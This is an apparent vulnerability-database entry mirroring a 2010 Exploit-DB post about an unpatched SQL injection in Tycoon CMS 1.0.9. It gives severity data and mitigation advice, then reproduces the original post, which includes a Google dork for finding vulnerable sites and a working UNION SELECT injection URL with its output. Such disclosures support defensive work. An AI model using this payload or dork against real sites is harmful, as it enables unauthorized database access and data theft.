Tycoon(CMS) Record Script Sql vulnerability

vendor:

Tycoon CMS

by:

Silic0n

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Tycoon CMS

Affected Version From: 1.0.9

Affected Version To: 1.0.9

Patch Exists: NO

Related CWE: N/A

CPE: a:tycoon:tycoon_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Tycoon(CMS) Record Script Sql vulnerability

Tycoon(CMS) is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a crafted request to the vulnerable application. By sending a specially crafted request to the vulnerable application, an attacker can execute arbitrary SQL commands in the back-end database. This can be used to access or modify the data in the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

% Tycoon(CMS) Record Script Sql vulnerability

-------------------------------------------------------------------------------
0                             | |              | |                      | |  TM
1   _______  _ __   ___ ______| |__   __ _  ___| | _____ _ __ _ __   ___| |_ 
0  |_  / _ \| '_ \ / _ \______| '_ \ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __|
1   / / (_) | | | |  __/      | | | | (_| | (__|   <  __/ | _| | | |  __/ |_ 
0  /___\___/|_| |_|\___|      |_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__|
1                         0xPrivate 0xSecurity 0xTeam 
0		++++++++++++++++++++++++++++++++++++++++++++++++++++
1		               A Placec Of 0days   
------------------------------------------------------------------------------

^Exploit Title  : Tycoon(CMS) Record Script Sql vulnerability
^Date 		: 7/8/2010
^Vendor Site 	: http://www.tycoon.co.kr
^MOD Version	: 1.0.9
^Author 	: Silic0n (science_media017[At]yahoo.com)
^category: 	: webapps/0day
^Dork		: inurl:index.php?mode=game_player

------------------------------------------------------------------------------
Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o ,
 Dark , XG3N , Belma(sweety), messsy , Thor ,abronsius ,Nova ,
 ConsoleFx , Exi , Beenu , R4cal , jaya ,entr0py,[]0iZy5 & All my friends . 

My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) , www.root-market.com ,www.Darkode.com ,r00tDefaced.com

----------------------------------->Exploit<----------------------------------

0x1: Goto http://{localhost}/record/index.php?mode=game_player&type=0&year=2010&game_id=-14 UNion Select 1,2,@@version

Version : (4.0.22-log)

------------------------------------------------------------------------------